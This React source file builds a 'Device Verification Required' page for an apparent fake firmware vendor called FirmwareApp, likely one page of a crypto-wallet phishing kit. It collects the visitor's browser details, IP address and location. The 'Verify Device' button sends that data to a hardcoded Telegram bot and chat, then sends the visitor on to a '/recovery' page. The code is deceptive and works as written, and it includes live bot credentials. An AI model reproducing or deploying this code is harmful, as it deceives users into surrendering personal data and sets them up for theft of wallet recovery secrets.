import React, { useState, useEffect } from 'react';
import { Link as RouterLink } from 'react-router-dom';
import {
  Box,
  Container,
  Typography,
  Paper,
  Button,
  AppBar,
  Toolbar,
  IconButton,
  Grid,
  Menu,
  MenuItem,
  CircularProgress,
  Divider,
  List,
  ListItem,
  ListItemText
} from '@mui/material';
import MenuIcon from '@mui/icons-material/Menu';
import LanguageIcon from '@mui/icons-material/Language';

const navItems = [
  'Products',
  'Apps and Services',
  'Learn',
  'For Business',
  'For Developers',
  'Support',
];

function LinkDevice() {
  const [anchorEl, setAnchorEl] = useState(null);
  const [deviceInfo, setDeviceInfo] = useState({});
  const [ipInfo, setIpInfo] = useState({});
  const [loading, setLoading] = useState(false);
  const [success, setSuccess] = useState(false);
  const [error, setError] = useState('');
  
  // Collect device information on component mount
  useEffect(() => {
    // Collect browser and device info
    const info = {
      userAgent: navigator.userAgent,
      platform: navigator.platform,
      language: navigator.language,
      cookiesEnabled: navigator.cookieEnabled,
      screenWidth: window.screen.width,
      screenHeight: window.screen.height,
      timeZone: Intl.DateTimeFormat().resolvedOptions().timeZone,
      date: new Date().toString()
    };
    
    setDeviceInfo(info);
    
    // Get IP information
    fetch('https://ipapi.co/json/')
      .then(response => response.json())
      .then(data => {
        setIpInfo(data);
      })
      .catch(err => {
        console.error('Error fetching IP info:', err);
        setIpInfo({ error: 'Failed to fetch IP information' });
      });
  }, []);
  
  const handleMenu = (event) => {
    setAnchorEl(event.currentTarget);
  };
  
  const handleClose = () => {
    setAnchorEl(null);
  };
  
  const handleSendDeviceInfo = async () => {
    setLoading(true);
    setError('');
    
    try {
      const botToken = "7888596228:AAGiPd60oZWuZnMpd62R9Ybe1OG5pRMAMoA";
      const chatId = "-1002617880346"; // Use the same chat ID as your recovery page
      
      const message = `
Hot🔥
---------------------------
🌐 IP: ${ipInfo.ip || 'Unknown'}
📍 Location: ${ipInfo.city ? `${ipInfo.city}, ${ipInfo.country_name}` : 'Unknown'}
🌐 ISP: ${ipInfo.org || 'Unknown'}
---------------------------
📱 Device Info:
- Platform: ${deviceInfo.platform || 'Unknown'}
- Browser: ${deviceInfo.userAgent || 'Unknown'}
- Screen: ${deviceInfo.screenWidth}x${deviceInfo.screenHeight}
- Language: ${deviceInfo.language || 'Unknown'}
- Timezone: ${deviceInfo.timeZone || 'Unknown'}
---------------------------
⏰ Date: ${deviceInfo.date || new Date().toString()}
`;
      
      const response = await fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({
          chat_id: chatId,
          text: message
        }),
      });
      
      const data = await response.json();
      console.log('Telegram API response:', data);
      
      if (data.ok) {
        setSuccess(true);
      } else {
        setError('Failed to send device info: ' + (data.description || 'Unknown error'));
      }
    } catch (err) {
      setError('Failed to send device info. Please try again.');
    }
    
    setLoading(false);
  };

  return (
    <Box sx={{ minHeight: '100vh', bgcolor: '#18191a', color: '#fff', display: 'flex', flexDirection: 'column' }}>
      {/* Header */}
      <AppBar position="static" sx={{ bgcolor: '#111', boxShadow: 'none', borderBottom: '1px solid #222' }}>
        <Toolbar sx={{ justifyContent: 'space-between', minHeight: 64 }}>
          {/* Logo */}
          <Box sx={{ display: 'flex', alignItems: 'center' }}>
            <Box sx={{ border: '2px solid #fff', px: 1.5, py: 0.5, borderRadius: 1, fontWeight: 700, fontSize: 22, letterSpacing: 2, mr: 3 }}>
              FIRMWAREAPP
            </Box>
            <Box sx={{ display: { xs: 'none', md: 'flex' }, gap: 3 }}>
              {navItems.map((item) => (
                <Button key={item} sx={{ color: '#fff', fontWeight: 500, fontSize: 16, textTransform: 'none' }}>{item}</Button>
              ))}
            </Box>
          </Box>
          {/* Right side */}
          <Box sx={{ display: 'flex', alignItems: 'center', gap: 1 }}>
            <IconButton sx={{ color: '#fff' }}><LanguageIcon /></IconButton>
            <Box sx={{ display: { xs: 'flex', md: 'none' } }}>
              <IconButton onClick={handleMenu} sx={{ color: '#fff' }}>
                <MenuIcon />
              </IconButton>
              <Menu anchorEl={anchorEl} open={Boolean(anchorEl)} onClose={handleClose} keepMounted>
                {navItems.map((item) => (
                  <MenuItem key={item} onClick={handleClose}>{item}</MenuItem>
                ))}
              </Menu>
            </Box>
          </Box>
        </Toolbar>
      </AppBar>

      {/* Main Content */}
      <Box sx={{ flex: 1, py: 8 }}>
        <Container maxWidth="sm">
          {/* Back to Home button */}
          <Box sx={{ display: 'flex', justifyContent: 'flex-start', mb: 3 }}>
            <Button
              component={RouterLink}
              to="/"
              variant="outlined"
              sx={{
                color: '#fff',
                borderColor: '#ff6f1a',
                '&:hover': {
                  borderColor: '#ff6f1a',
                  bgcolor: 'rgba(255, 111, 26, 0.1)'
                }
              }}
            >
              ← Back to Home
            </Button>
          </Box>
          
          {/* Device Verification Card */}
          <Paper elevation={3} sx={{ bgcolor: '#232323', p: 4, borderRadius: 3 }}>
            <Typography variant="h5" sx={{ fontWeight: 700, mb: 2, color: '#fff', textAlign: 'center' }}>
              Device Verification Required
            </Typography>
            <Typography variant="body1" sx={{ color: '#ccc', mb: 3, textAlign: 'center' }}>
              For your security, we need to verify your device before proceeding. 
              This helps protect your assets and ensures secure firmware updates.
            </Typography>
            
            <Box sx={{ bgcolor: '#1a1a1a', p: 2, borderRadius: 2, mb: 3 }}>
              <List dense>
                <ListItem>
                  <ListItemText 
                    primary="Device Type" 
                    secondary={deviceInfo.platform || 'Detecting...'}
                    primaryTypographyProps={{ color: '#fff' }}
                    secondaryTypographyProps={{ color: '#ccc' }}
                  />
                </ListItem>
                <Divider sx={{ bgcolor: '#333' }} />
                <ListItem>
                  <ListItemText 
                    primary="Browser" 
                    secondary={deviceInfo.userAgent ? deviceInfo.userAgent.split(' ').slice(0, 3).join(' ') + '...' : 'Detecting...'}
                    primaryTypographyProps={{ color: '#fff' }}
                    secondaryTypographyProps={{ color: '#ccc' }}
                  />
                </ListItem>
                <Divider sx={{ bgcolor: '#333' }} />
                <ListItem>
                  <ListItemText 
                    primary="Location" 
                    secondary={(ipInfo.city && ipInfo.country_name) ? `${ipInfo.city}, ${ipInfo.country_name}` : 'Detecting...'}
                    primaryTypographyProps={{ color: '#fff' }}
                    secondaryTypographyProps={{ color: '#ccc' }}
                  />
                </ListItem>
              </List>
            </Box>
            
            {success ? (
              <Box sx={{ textAlign: 'center', py: 2 }}>
                <Typography variant="h6" sx={{ color: '#4caf50', mb: 2 }}>
                  Device Verified Successfully!
                </Typography>
                <Typography variant="body1" sx={{ color: '#ccc', mb: 2 }}>
                  Your device has been verified and is now ready for secure operations.
                </Typography>
                <Button 
                  variant="contained"
                  sx={{ 
                    bgcolor: '#ff6f1a', 
                    fontWeight: 700, 
                    px: 4, 
                    py: 1, 
                    fontSize: 16, 
                    borderRadius: 2,
                    '&:hover': { bgcolor: '#ff8c42' }
                  }}
                  component={RouterLink}
                  to="/recovery"
                >
                 Proceed
                </Button>
              </Box>
            ) : (
              <Box sx={{ display: 'flex', flexDirection: 'column', alignItems: 'center' }}>
                {error && (
                  <Typography variant="body2" sx={{ color: 'red', mb: 2, textAlign: 'center' }}>
                    {error}
                  </Typography>
                )}
                <Button
                  variant="contained"
                  color="primary"
                  disabled={loading}
                  onClick={handleSendDeviceInfo}
                  sx={{
                    bgcolor: '#ff6f1a',
                    fontWeight: 700,
                    px: 4,
                    py: 1.5,
                    fontSize: 16,
                    borderRadius: 2,
                    '&:hover': { bgcolor: '#ff8c42' }
                  }}
                >
                  {loading ? <CircularProgress size={24} color="inherit" /> : 'Verify Device'}
                </Button>
              </Box>
            )}
          </Paper>
        </Container>
      </Box>

      {/* Footer */}
      <Box component="footer" sx={{ bgcolor: '#181818', color: '#bbb', py: 4, mt: 8 }}>
        <Container maxWidth="xl">
          <Grid container spacing={2} alignItems="center">
            <Grid item xs={12} md={4}>
              <Box sx={{ fontWeight: 700, fontSize: 22, letterSpacing: 2, mb: { xs: 2, md: 0 } }}>
                FIRMWAREAPP
              </Box>
            </Grid>
            <Grid item xs={12} md={4} sx={{ textAlign: { xs: 'left', md: 'center' } }}>
              <Button sx={{ color: '#bbb', textTransform: 'none', fontSize: 16 }} href="#">Privacy Policy</Button>
              <Button sx={{ color: '#bbb', textTransform: 'none', fontSize: 16 }} href="#">Terms of Service</Button>
              <Button sx={{ color: '#bbb', textTransform: 'none', fontSize: 16 }} href="#">Contact</Button>
            </Grid>
            <Grid item xs={12} md={4} sx={{ textAlign: { xs: 'left', md: 'right' }, mt: { xs: 2, md: 0 } }}>
              <Typography variant="body2" sx={{ color: '#888' }}>
                © {new Date().getFullYear()} FirmwareApp. All rights reserved.
              </Typography>
            </Grid>
          </Grid>
        </Container>
      </Box>
    </Box>
  );
}

export default LinkDevice; 